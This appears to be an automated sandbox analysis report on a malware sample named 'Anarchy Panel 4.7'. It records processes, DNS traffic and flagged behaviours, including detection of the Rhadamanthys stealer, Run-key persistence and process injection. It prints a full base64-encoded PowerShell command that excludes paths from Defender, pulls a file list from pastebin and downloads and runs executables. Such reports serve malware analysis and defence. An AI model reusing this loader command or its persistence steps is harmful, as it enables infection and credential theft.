
C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\0guo3zbo66fqoG.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1563s

Max time network

1566s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\EVa7gBMKoaHmLC.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\EVa7gBMKoaHmLC.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1560s

Max time network

1564s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\FBSyChwp.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\FBSyChwp.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

828s

Max time network

1166s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\WkUP83aP9CABpi.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\WkUP83aP9CABpi.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 64.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1745s

Max time network

1159s

Command Line

"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe.xml"

Signatures

Processes

C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE

"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe.xml"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 428 -p 2684 -ip 2684

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2684 -s 448

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 1.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 27.178.89.13.in-addr.arpa udp

Files

memory/2684-134-0x00007FF9329F0000-0x00007FF932BE5000-memory.dmp

memory/2684-133-0x00007FF8F2A70000-0x00007FF8F2A80000-memory.dmp

memory/2684-135-0x00007FF9329F0000-0x00007FF932BE5000-memory.dmp

memory/2684-136-0x00007FF9305C0000-0x00007FF930889000-memory.dmp

memory/2684-137-0x00007FF8F2A70000-0x00007FF8F2A80000-memory.dmp

memory/2684-138-0x00007FF9329F0000-0x00007FF932BE5000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1561s

Max time network

1568s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\G3nl0mDcABnDuZ.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\G3nl0mDcABnDuZ.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

829s

Max time network

1160s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\G3nl0mDcABnDuZ.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\G3nl0mDcABnDuZ.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 202.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 63.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1556s

Max time network

1560s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mGWHaG2Jn.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mGWHaG2Jn.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

786s

Max time network

1125s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\0guo3zbo66fqoG.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\0guo3zbo66fqoG.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1157s

Max time network

1163s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\59Zp7paEHDF7luJ.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\59Zp7paEHDF7luJ.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 202.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1145s

Max time network

1153s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\FBSyChwp.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\FBSyChwp.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1559s

Max time network

1562s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\PK0TcnqTGFagQTS.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\PK0TcnqTGFagQTS.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1162s

Max time network

1168s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\PK0TcnqTGFagQTS.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\PK0TcnqTGFagQTS.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1559s

Max time network

1564s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\eMTYbTz0gueNs4.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\eMTYbTz0gueNs4.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1644s

Max time network

1143s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\eMTYbTz0gueNs4.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\eMTYbTz0gueNs4.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 64.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 224.162.46.104.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1566s

Max time network

1569s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe

"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp

Files

memory/1936-55-0x0000000074470000-0x0000000074A1B000-memory.dmp

memory/1936-56-0x0000000074470000-0x0000000074A1B000-memory.dmp

memory/1936-57-0x0000000002670000-0x00000000026B0000-memory.dmp

memory/1936-58-0x0000000002670000-0x00000000026B0000-memory.dmp

memory/1936-59-0x0000000074470000-0x0000000074A1B000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1800s

Max time network

1149s

Command Line

C:\Windows\system32\lsass.exe

Signatures

Detect rhadamanthys stealer shellcode

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Rhadamanthys

stealer rhadamanthys

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" " C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4860 set thread context of 4456 N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe C:\Windows\System32\dialer.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dialer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3220 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4632 wrote to memory of 2240 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe
PID 4632 wrote to memory of 2240 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe
PID 4632 wrote to memory of 4860 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe
PID 4632 wrote to memory of 4860 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe
PID 4632 wrote to memory of 448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe
PID 4632 wrote to memory of 448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe
PID 4632 wrote to memory of 448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe
PID 4632 wrote to memory of 2376 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe
PID 4632 wrote to memory of 2376 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe
PID 4632 wrote to memory of 2376 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe
PID 384 wrote to memory of 3276 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 3276 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 5004 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 5004 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
